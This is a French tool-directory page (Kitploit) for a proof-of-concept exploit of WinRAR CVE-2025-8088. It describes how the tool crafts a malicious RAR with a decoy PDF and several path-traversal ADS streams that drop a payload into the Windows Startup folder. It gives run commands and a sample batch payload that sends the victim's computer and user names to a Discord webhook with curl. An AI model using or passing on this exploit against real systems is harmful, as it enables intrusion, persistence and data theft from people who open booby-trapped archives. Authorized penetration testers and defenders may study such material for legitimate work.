Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
best-CVE-2025-8088 — Exploitation de la CVE Winrar avant 7.13 en utilisant plusieurs flux ADS sur un seul fichier (implémentation PDF personnalisée) | Kitploit
Outils/GitHubGitHub/pentestfunctions/best-cve-2025-8088
Analyse des VulnérabilitésExploitationPost-ExploitationTests d'IntrusionRed TeamingDéveloppement de Charges UtilesExploitation de Binaires
GitHubpentestfunctions/best-cve-2025-8088

best-CVE-2025-8088

Exploitation de la CVE Winrar avant 7.13 en utilisant plusieurs flux ADS sur un seul fichier (implémentation PDF personnalisée)

Voir le dépôt
113il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Exploit WinRAR CVE-2025-8088 🔓

Un exploit de preuve de concept pour la vulnérabilité WinRAR (CVE-2025-8088) affectant les versions 7.12 et inférieures. Cet outil crée une archive RAR malveillante qui intègre des charges utiles dans des flux de données alternatifs (ADS) avec une traversée de chemin, pouvant potentiellement conduire à une exécution de code arbitraire.

  • Le problème avec beaucoup d'autres est qu'ils n'intègrent pas plusieurs flux ADS, nécessitant soit d'avoir par chance le bon chemin de traversée, soit de connaître le nom d'utilisateur ou le répertoire d'extraction exact.

🚀 Comment ça marche

  1. Crée un document leurre 📄 - Génère un PDF à l'aspect professionnel (CV ou rapport de pentest)
  2. Intègre plusieurs flux ADS 🔄 - Attache des flux de charge utile avec différentes profondeurs de traversée de chemin
  3. Manipule les en-têtes RAR ⚙️ - Modifie la structure de l'archive pour exploiter la vulnérabilité de traversée de chemin
  4. Dépose la charge utile dans le dossier de démarrage 📂 - Tente d'écrire la charge utile dans le dossier de démarrage de Windows lors de l'extraction

🛠️ Utilisation

root@kitploit:~
# Clone the repository
git clone https://github.com/pentestfunctions/best-CVE-2025-8088.git
cd best-CVE-2025-8088

# Install dependencies
pip install reportlab

# Run the exploit
python CVE-2025-8088.py

✏️ Personnalisation de la charge utile

Modifiez la charge utile pour appeler un webhook Discord :

root@kitploit:~
# Replace the PAYLOAD variable in the script:
PAYLOAD = """@echo off
curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"Extracted on %COMPUTERNAME% by %USERNAME%\"}" YOUR_DISCORD_WEBHOOK_URL
pause
"""

Remplacez YOUR_DISCORD_WEBHOOK_URL par votre véritable URL de webhook.

🔄 Déroulement de l'exécution

  1. La victime extrait le RAR avec WinRAR vulnérable (≤7.12)
  2. La charge utile est écrite dans le dossier de démarrage :
    root@kitploit:~
    AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
    
  3. Au prochain redémarrage ➡️ la charge utile s'exécute automatiquement

📋 Prérequis

  • Système d'exploitation Windows 🪟
  • Python 3.x 🐍
  • WinRAR installé
  • Bibliothèque ReportLab (pip install reportlab)
Télécharger l’outil